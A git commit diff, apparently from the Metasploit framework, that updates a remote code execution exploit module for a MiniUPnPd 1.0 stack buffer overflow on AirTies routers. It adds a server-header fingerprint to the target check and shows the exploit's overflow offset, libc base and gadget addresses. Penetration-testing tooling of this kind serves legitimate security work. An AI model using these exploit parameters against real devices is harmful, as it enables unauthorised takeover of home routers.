fingerprint, title

bug/bundler_fix
m-1-k-3 2015-04-27 06:34:46 +02:00
parent 285d767e20
commit 8db88994ac
1 changed files with 6 additions and 4 deletions


@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
'Name' => 'AirTies MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
'Description' => %q{
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
present in the SOAPAction HTTP header handling.
@ -41,8 +41,9 @@ class Metasploit3 < Msf::Exploit::Remote
{
'Offset' => 2048,
'LibcBase' => 0x2aabd000,
'System' => 0x00031AC0 ,
'CallSystem' => 0x0001CC94 # prepare $a0 and jump to $s0
'System' => 0x00031AC0,
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
'ServerHeader' => "AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0" # Fingerprint
}
],
],
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => "/",
})
if res && res.headers['Server'] =~ /miniupnpd\/1.0/
if res && res.headers['Server'] == target['ServerHeader']
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
@ -74,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("#{peer} - Accessing the vulnerable URL...")
print_status(target['ServerHeader'])
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")